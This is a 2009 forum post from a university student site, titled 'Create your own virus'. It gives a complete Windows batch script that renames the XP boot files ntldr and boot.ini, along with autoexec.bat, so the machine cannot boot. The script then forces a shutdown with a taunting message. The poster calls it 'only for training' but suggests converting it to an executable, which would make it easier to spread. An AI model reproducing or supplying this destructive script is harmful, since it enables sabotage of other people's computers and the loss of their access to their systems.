BZU PAGES: Find Presentations, Reports, Student's Assignments and Daily Discussion; Bahauddin Zakariya University Multan

BZU PAGES: Find Presentations, Reports, Student's Assignments and Daily Discussion; Bahauddin Zakariya University Multan (http://bzupages.com/)
-   PC and Windows Tutorial (http://bzupages.com/271-pc-windows-tutorial/)
-   -   Create your own virus (http://bzupages.com/f271/create-your-own-virus-4242/)

usman_latif_ch 07-06-2009 03:40 PM

Create your own virus
 
But, first BE EXTREMELY CAREFUL.. I WOULD SERIOUSLY ADVICE YOU TO NOT TO RUN THIS ON YOUR PC ATLEAST. I TAKE NO RESPONSIBILITY OF HOW YOU USE THIS CODE. THIS IS ONLY FOR TRAINING. NOTHING ELSE. my virus uses batch processing to rename the xp booting file ntldr as ntls. and boot.ini as boot.int.. and displays a message for 4 seconds. and automatically shuts down your PC (forever )..

Open notepad and paste the following code.. save it as .bat ... any file name with extension bat ..



@echo off
attrib c:\autoexec.bat -s -h -r
ren c:\autoexec.bat aute.bit
attrib c:\ntldr -s -h -r
ren c:\ntldr ntls
attrib c:\boot.ini -s -h -r
ren c:\boot.ini bot.int
@echo off



shutdown -s -t 4 -c "Your Computer is Doomed!!!"
you can add many variations to it.. You can also use any BATCH to EXE converter to convert your file into executable one


All times are GMT +5. The time now is 05:35 AM.

Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.